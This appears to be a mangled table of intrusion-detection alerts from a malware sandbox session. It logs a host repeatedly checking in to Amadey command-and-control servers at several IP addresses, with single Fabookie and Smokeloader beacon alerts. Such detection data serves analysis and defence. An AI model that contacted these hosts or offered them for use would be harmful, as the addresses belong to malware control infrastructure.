                                                                                                                                                                                    192.168.2.445.66.230.12350177802027700 01/05/23-08:59:58.690383TCP2027700ET TROJAN Amadey CnC Check-In5017780192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950571802027700 01/05/23-09:00:42.476353TCP2027700ET TROJAN Amadey CnC Check-In5057180192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10949756802027700 01/05/23-08:58:38.209554TCP2027700ET TROJAN Amadey CnC Check-In4975680192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950755802027700 01/05/23-09:01:01.595984TCP2027700ET TROJAN Amadey CnC Check-In5075580192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950412802027700 01/05/23-09:00:25.086655TCP2027700ET TROJAN Amadey CnC Check-In5041280192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10949845802027700 01/05/23-08:59:03.794441TCP2027700ET TROJAN Amadey CnC Check-In4984580192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10949943802027700 01/05/23-08:59:21.437009TCP2027700ET TROJAN Amadey CnC Check-In4994380192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350711802027700 01/05/23-09:00:57.589885TCP2027700ET TROJAN Amadey CnC Check-In5071180192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350428802027700 01/05/23-09:00:26.587203TCP2027700ET TROJAN Amadey CnC Check-In5042880192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350774802027700 01/05/23-09:01:03.115251TCP2027700ET TROJAN Amadey CnC Check-In5077480192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350806802027700 01/05/23-09:01:05.939953TCP2027700ET TROJAN Amadey CnC Check-In5080680192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.32.200.11350056802027700 01/05/23-08:59:44.471517TCP2027700ET TROJAN Amadey CnC Check-In5005680192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350803802027700 01/05/23-09:01:05.539950TCP2027700ET TROJAN Amadey CnC Check-In5080380192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950685802027700 01/05/23-09:00:55.221387TCP2027700ET TROJAN Amadey CnC Check-In5068580192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350809802027700 01/05/23-09:01:06.079110TCP2027700ET TROJAN Amadey CnC Check-In5080980192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950817802027700 01/05/23-09:01:06.726550TCP2027700ET TROJAN Amadey CnC Check-In5081780192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950235802027700 01/05/23-09:00:04.508115TCP2027700ET TROJAN Amadey CnC Check-In5023580192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12349995802027700 01/05/23-08:59:30.866105TCP2027700ET TROJAN Amadey CnC Check-In4999580192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950146802027700 01/05/23-08:59:54.381680TCP2027700ET TROJAN Amadey CnC Check-In5014680192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350714802027700 01/05/23-09:00:57.703515TCP2027700ET TROJAN Amadey CnC Check-In5071480192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12349869802027700 01/05/23-08:59:08.266960TCP2027700ET TROJAN Amadey CnC Check-In4986980192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949996802027700 01/05/23-08:59:30.931807TCP2027700ET TROJAN Amadey CnC Check-In4999680192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950403802027700 01/05/23-09:00:24.288421TCP2027700ET TROJAN Amadey CnC Check-In5040380192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350151802027700 01/05/23-08:59:54.833832TCP2027700ET TROJAN Amadey CnC Check-In5015180192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350300802027700 01/05/23-09:00:10.721101TCP2027700ET TROJAN Amadey CnC Check-In5030080192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350234802027700 01/05/23-09:00:04.336653TCP2027700ET TROJAN Amadey CnC Check-In5023480192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350684802027700 01/05/23-09:00:55.017216TCP2027700ET TROJAN Amadey CnC Check-In5068480192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350148802027700 01/05/23-08:59:54.583580TCP2027700ET TROJAN Amadey CnC Check-In5014880192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350497802027700 01/05/23-09:00:35.817971TCP2027700ET TROJAN Amadey CnC Check-In5049780192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350243802027700 01/05/23-09:00:05.196825TCP2027700ET TROJAN Amadey CnC Check-In5024380192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950346802027700 01/05/23-09:00:17.999143TCP2027700ET TROJAN Amadey CnC Check-In5034680192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350595802027700 01/05/23-09:00:44.351558TCP2027700ET TROJAN Amadey CnC Check-In5059580192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350059802027700 01/05/23-08:59:44.753563TCP2027700ET TROJAN Amadey CnC Check-In5005980192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350596802027700 01/05/23-09:00:44.474758TCP2027700ET TROJAN Amadey CnC Check-In5059680192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.32.200.11350431802027700 01/05/23-09:00:26.987028TCP2027700ET TROJAN Amadey CnC Check-In5043180192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10949993802027700 01/05/23-08:59:30.595868TCP2027700ET TROJAN Amadey CnC Check-In4999380192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10949911802027700 01/05/23-08:59:13.527874TCP2027700ET TROJAN Amadey CnC Check-In4991180192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12349939802027700 01/05/23-08:59:17.298134TCP2027700ET TROJAN Amadey CnC Check-In4993980192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350501802027700 01/05/23-09:00:36.687757TCP2027700ET TROJAN Amadey CnC Check-In5050180192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350313802027700 01/05/23-09:00:11.945166TCP2027700ET TROJAN Amadey CnC Check-In5031380192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350573802027700 01/05/23-09:00:42.640948TCP2027700ET TROJAN Amadey CnC Check-In5057380192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350402802027700 01/05/23-09:00:24.157770TCP2027700ET TROJAN Amadey CnC Check-In5040280192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350237802027700 01/05/23-09:00:04.785091TCP2027700ET TROJAN Amadey CnC Check-In5023780192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350259802027700 01/05/23-09:00:06.795361TCP2027700ET TROJAN Amadey CnC Check-In5025980192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950584802027700 01/05/23-09:00:43.727136TCP2027700ET TROJAN Amadey CnC Check-In5058480192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10949841802027700 01/05/23-08:59:03.391327TCP2027700ET TROJAN Amadey CnC Check-In4984180192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950498802027700 01/05/23-09:00:35.865431TCP2027700ET TROJAN Amadey CnC Check-In5049880192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950244802027700 01/05/23-09:00:05.330627TCP2027700ET TROJAN Amadey CnC Check-In5024480192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350570802027700 01/05/23-09:00:42.356827TCP2027700ET TROJAN Amadey CnC Check-In5057080192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12349856802027700 01/05/23-08:59:05.854605TCP2027700ET TROJAN Amadey CnC Check-In4985680192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949924802027700 01/05/23-08:59:15.349563TCP2027700ET TROJAN Amadey CnC Check-In4992480192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950050802027700 01/05/23-08:59:43.526081TCP2027700ET TROJAN Amadey CnC Check-In5005080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950429802027700 01/05/23-09:00:26.766515TCP2027700ET TROJAN Amadey CnC Check-In5042980192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10949768802027700 01/05/23-08:58:44.569908TCP2027700ET TROJAN Amadey CnC Check-In4976880192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350332802027700 01/05/23-09:00:16.344925TCP2027700ET TROJAN Amadey CnC Check-In5033280192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950669802027700 01/05/23-09:00:53.437300TCP2027700ET TROJAN Amadey CnC Check-In5066980192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350095802027700 01/05/23-08:59:49.534064TCP2027700ET TROJAN Amadey CnC Check-In5009580192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10950804802027700 01/05/23-09:01:05.730740TCP2027700ET TROJAN Amadey CnC Check-In5080480192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350303802027700 01/05/23-09:00:10.920218TCP2027700ET TROJAN Amadey CnC Check-In5030380192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350477802027700 01/05/23-09:00:34.531436TCP2027700ET TROJAN Amadey CnC Check-In5047780192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949940802027700 01/05/23-08:59:17.860681TCP2027700ET TROJAN Amadey CnC Check-In4994080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950363802027700 01/05/23-09:00:20.166454TCP2027700ET TROJAN Amadey CnC Check-In5036380192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10949762802027700 01/05/23-08:58:39.516895TCP2027700ET TROJAN Amadey CnC Check-In4976280192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950152802027700 01/05/23-08:59:55.124461TCP2027700ET TROJAN Amadey CnC Check-In5015280192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950448802027700 01/05/23-09:00:28.984022TCP2027700ET TROJAN Amadey CnC Check-In5044880192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10949983802027700 01/05/23-08:59:29.068696TCP2027700ET TROJAN Amadey CnC Check-In4998380192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350434802027700 01/05/23-09:00:27.286420TCP2027700ET TROJAN Amadey CnC Check-In5043480192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350098802027700 01/05/23-08:59:49.765594TCP2027700ET TROJAN Amadey CnC Check-In5009880192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350256802027700 01/05/23-09:00:06.604757TCP2027700ET TROJAN Amadey CnC Check-In5025680192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949772802027700 01/05/23-08:58:45.558634TCP2027700ET TROJAN Amadey CnC Check-In4977280192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950307802027700 01/05/23-09:00:11.399055TCP2027700ET TROJAN Amadey CnC Check-In5030780192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950212802027700 01/05/23-09:00:02.305946TCP2027700ET TROJAN Amadey CnC Check-In5021280192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350181802027700 01/05/23-08:59:59.155389TCP2027700ET TROJAN Amadey CnC Check-In5018180192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950195802027700 01/05/23-09:00:00.463308TCP2027700ET TROJAN Amadey CnC Check-In5019580192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950373802027700 01/05/23-09:00:21.406793TCP2027700ET TROJAN Amadey CnC Check-In5037380192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12349853802027700 01/05/23-08:59:05.252018TCP2027700ET TROJAN Amadey CnC Check-In4985380192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950129802027700 01/05/23-08:59:52.984377TCP2027700ET TROJAN Amadey CnC Check-In5012980192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950521802027700 01/05/23-09:00:38.171472TCP2027700ET TROJAN Amadey CnC Check-In5052180192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10949950802027700 01/05/23-08:59:23.159452TCP2027700ET TROJAN Amadey CnC Check-In4995080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950551802027700 01/05/23-09:00:40.708401TCP2027700ET TROJAN Amadey CnC Check-In5055180192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350796802027700 01/05/23-09:01:04.967692TCP2027700ET TROJAN Amadey CnC Check-In5079680192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350009802027700 01/05/23-08:59:33.049312TCP2027700ET TROJAN Amadey CnC Check-In5000980192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949795802027700 01/05/23-08:58:52.100118TCP2027700ET TROJAN Amadey CnC Check-In4979580192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950106802027700 01/05/23-08:59:50.631601TCP2027700ET TROJAN Amadey CnC Check-In5010680192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12349866802027700 01/05/23-08:59:07.816063TCP2027700ET TROJAN Amadey CnC Check-In4986680192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12349900802027700 01/05/23-08:59:12.531485TCP2027700ET TROJAN Amadey CnC Check-In4990080192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350194802027700 01/05/23-09:00:00.270444TCP2027700ET TROJAN Amadey CnC Check-In5019480192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950034802027700 01/05/23-08:59:41.402873TCP2027700ET TROJAN Amadey CnC Check-In5003480192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950024802027700 01/05/23-08:59:35.617721TCP2027700ET TROJAN Amadey CnC Check-In5002480192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.159.1850515802851115 01/05/23-09:00:38.190847TCP2851115ETPRO TROJAN Win32/Fabookie.ek CnC Activity M25051580192.168.2.445.66.159.18
                                                                                                                                                                                    192.168.2.445.66.230.12350191802027700 01/05/23-09:00:00.048057TCP2027700ET TROJAN Amadey CnC Check-In5019180192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350279802027700 01/05/23-09:00:08.746519TCP2027700ET TROJAN Amadey CnC Check-In5027980192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350767802027700 01/05/23-09:01:02.831756TCP2027700ET TROJAN Amadey CnC Check-In5076780192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350550802027700 01/05/23-09:00:40.652719TCP2027700ET TROJAN Amadey CnC Check-In5055080192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350019802027700 01/05/23-08:59:35.152748TCP2027700ET TROJAN Amadey CnC Check-In5001980192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949775802027700 01/05/23-08:58:46.727556TCP2027700ET TROJAN Amadey CnC Check-In4977580192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350800802027700 01/05/23-09:01:05.363036TCP2027700ET TROJAN Amadey CnC Check-In5080080192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950267802027700 01/05/23-09:00:07.554984TCP2027700ET TROJAN Amadey CnC Check-In5026780192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350668802027700 01/05/23-09:00:53.404259TCP2027700ET TROJAN Amadey CnC Check-In5066880192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949953802027700 01/05/23-08:59:23.590906TCP2027700ET TROJAN Amadey CnC Check-In4995380192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350408802027700 01/05/23-09:00:24.809813TCP2027700ET TROJAN Amadey CnC Check-In5040880192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950564802027700 01/05/23-09:00:41.851157TCP2027700ET TROJAN Amadey CnC Check-In5056480192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950126802027700 01/05/23-08:59:52.706718TCP2027700ET TROJAN Amadey CnC Check-In5012680192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350296802027700 01/05/23-09:00:10.277186TCP2027700ET TROJAN Amadey CnC Check-In5029680192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350072802027700 01/05/23-08:59:46.911726TCP2027700ET TROJAN Amadey CnC Check-In5007280192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.32.200.11350398802027700 01/05/23-09:00:23.940590TCP2027700ET TROJAN Amadey CnC Check-In5039880192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350444802027700 01/05/23-09:00:28.231736TCP2027700ET TROJAN Amadey CnC Check-In5044480192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949792802027700 01/05/23-08:58:51.792306TCP2027700ET TROJAN Amadey CnC Check-In4979280192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10949917802027700 01/05/23-08:59:14.362847TCP2027700ET TROJAN Amadey CnC Check-In4991780192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950182802027700 01/05/23-08:59:59.116679TCP2027700ET TROJAN Amadey CnC Check-In5018280192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350276802027700 01/05/23-09:00:08.520289TCP2027700ET TROJAN Amadey CnC Check-In5027680192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350174802027700 01/05/23-08:59:58.408260TCP2027700ET TROJAN Amadey CnC Check-In5017480192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350263802027700 01/05/23-09:00:07.180447TCP2027700ET TROJAN Amadey CnC Check-In5026380192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350747802027700 01/05/23-09:01:00.773395TCP2027700ET TROJAN Amadey CnC Check-In5074780192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350000802027700 01/05/23-08:59:31.764454TCP2027700ET TROJAN Amadey CnC Check-In5000080192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350128802027700 01/05/23-08:59:52.910768TCP2027700ET TROJAN Amadey CnC Check-In5012880192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350217802027700 01/05/23-09:00:02.806984TCP2027700ET TROJAN Amadey CnC Check-In5021780192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950409802027700 01/05/23-09:00:24.809104TCP2027700ET TROJAN Amadey CnC Check-In5040980192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350306802027700 01/05/23-09:00:11.389535TCP2027700ET TROJAN Amadey CnC Check-In5030680192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12349968802027700 01/05/23-08:59:26.374672TCP2027700ET TROJAN Amadey CnC Check-In4996880192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12349978802027700 01/05/23-08:59:28.288952TCP2027700ET TROJAN Amadey CnC Check-In4997880192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.4222.236.49.12450001802851815 01/05/23-08:59:32.005402TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 185000180192.168.2.4222.236.49.124
                                                                                                                                                                                    192.168.2.445.66.230.12350648802027700 01/05/23-09:00:52.314587TCP2027700ET TROJAN Amadey CnC Check-In5064880192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350737802027700 01/05/23-09:00:59.946119TCP2027700ET TROJAN Amadey CnC Check-In5073780192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350731802027700 01/05/23-09:00:59.516961TCP2027700ET TROJAN Amadey CnC Check-In5073180192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350559802027700 01/05/23-09:00:41.545121TCP2027700ET TROJAN Amadey CnC Check-In5055980192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350566802027700 01/05/23-09:00:42.193879TCP2027700ET TROJAN Amadey CnC Check-In5056680192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10950350802027700 01/05/23-09:00:18.507774TCP2027700ET TROJAN Amadey CnC Check-In5035080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950633802027700 01/05/23-09:00:48.158848TCP2027700ET TROJAN Amadey CnC Check-In5063380192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350375802027700 01/05/23-09:00:21.681622TCP2027700ET TROJAN Amadey CnC Check-In5037580192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950567802027700 01/05/23-09:00:42.161434TCP2027700ET TROJAN Amadey CnC Check-In5056780192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950389802027700 01/05/23-09:00:22.867048TCP2027700ET TROJAN Amadey CnC Check-In5038980192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12349988802027700 01/05/23-08:59:29.862643TCP2027700ET TROJAN Amadey CnC Check-In4998880192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949802802027700 01/05/23-08:58:53.001309TCP2027700ET TROJAN Amadey CnC Check-In4980280192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12349906802027700 01/05/23-08:59:13.066974TCP2027700ET TROJAN Amadey CnC Check-In4990680192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949782802027700 01/05/23-08:58:50.528332TCP2027700ET TROJAN Amadey CnC Check-In4978280192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12349909802027700 01/05/23-08:59:13.298357TCP2027700ET TROJAN Amadey CnC Check-In4990980192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350197802027700 01/05/23-09:00:00.743514TCP2027700ET TROJAN Amadey CnC Check-In5019780192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350540802027700 01/05/23-09:00:39.761876TCP2027700ET TROJAN Amadey CnC Check-In5054080192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350102802027700 01/05/23-08:59:50.213457TCP2027700ET TROJAN Amadey CnC Check-In5010280192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350286802027700 01/05/23-09:00:09.400947TCP2027700ET TROJAN Amadey CnC Check-In5028680192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350632802027700 01/05/23-09:00:48.014171TCP2027700ET TROJAN Amadey CnC Check-In5063280192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350388802027700 01/05/23-09:00:22.934817TCP2027700ET TROJAN Amadey CnC Check-In5038880192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350013802027700 01/05/23-08:59:34.003382TCP2027700ET TROJAN Amadey CnC Check-In5001380192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350016802027700 01/05/23-08:59:34.645385TCP2027700ET TROJAN Amadey CnC Check-In5001680192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950376802027700 01/05/23-09:00:21.728685TCP2027700ET TROJAN Amadey CnC Check-In5037680192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950198802027700 01/05/23-09:00:00.797686TCP2027700ET TROJAN Amadey CnC Check-In5019880192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950080802027700 01/05/23-08:59:47.761595TCP2027700ET TROJAN Amadey CnC Check-In5008080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350362802027700 01/05/23-09:00:19.974697TCP2027700ET TROJAN Amadey CnC Check-In5036280192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350556802027700 01/05/23-09:00:41.255796TCP2027700ET TROJAN Amadey CnC Check-In5055680192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350645802027700 01/05/23-09:00:50.308849TCP2027700ET TROJAN Amadey CnC Check-In5064580192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949976802027700 01/05/23-08:59:27.876514TCP2027700ET TROJAN Amadey CnC Check-In4997680192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350029802027700 01/05/23-08:59:40.224490TCP2027700ET TROJAN Amadey CnC Check-In5002980192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350451802027700 01/05/23-09:00:29.246458TCP2027700ET TROJAN Amadey CnC Check-In5045180192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350289802027700 01/05/23-09:00:09.612716TCP2027700ET TROJAN Amadey CnC Check-In5028980192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12349873802027700 01/05/23-08:59:08.865896TCP2027700ET TROJAN Amadey CnC Check-In4987380192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350118802027700 01/05/23-08:59:51.834580TCP2027700ET TROJAN Amadey CnC Check-In5011880192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950014802027700 01/05/23-08:59:34.178140TCP2027700ET TROJAN Amadey CnC Check-In5001480192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950103802027700 01/05/23-08:59:50.320011TCP2027700ET TROJAN Amadey CnC Check-In5010380192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350705802027700 01/05/23-09:00:57.034412TCP2027700ET TROJAN Amadey CnC Check-In5070580192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10950020802027700 01/05/23-08:59:34.976791TCP2027700ET TROJAN Amadey CnC Check-In5002080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350218802027700 01/05/23-09:00:02.884885TCP2027700ET TROJAN Amadey CnC Check-In5021880192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12349895802027700 01/05/23-08:59:11.730522TCP2027700ET TROJAN Amadey CnC Check-In4989580192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950176802027700 01/05/23-08:59:58.564874TCP2027700ET TROJAN Amadey CnC Check-In5017680192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350610802027700 01/05/23-09:00:45.966157TCP2027700ET TROJAN Amadey CnC Check-In5061080192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10950406802027700 01/05/23-09:00:24.541555TCP2027700ET TROJAN Amadey CnC Check-In5040680192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10949753802027700 01/05/23-08:58:37.519523TCP2027700ET TROJAN Amadey CnC Check-In4975380192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350162802027700 01/05/23-08:59:57.516191TCP2027700ET TROJAN Amadey CnC Check-In5016280192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350425802027700 01/05/23-09:00:26.391142TCP2027700ET TROJAN Amadey CnC Check-In5042580192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350621802027700 01/05/23-09:00:46.825545TCP2027700ET TROJAN Amadey CnC Check-In5062180192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950344802027700 01/05/23-09:00:17.742322TCP2027700ET TROJAN Amadey CnC Check-In5034480192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350229802027700 01/05/23-09:00:03.909654TCP2027700ET TROJAN Amadey CnC Check-In5022980192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950495802027700 01/05/23-09:00:35.569791TCP2027700ET TROJAN Amadey CnC Check-In5049580192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350167802027700 01/05/23-08:59:57.962831TCP2027700ET TROJAN Amadey CnC Check-In5016780192.168.2.445.66.230.123
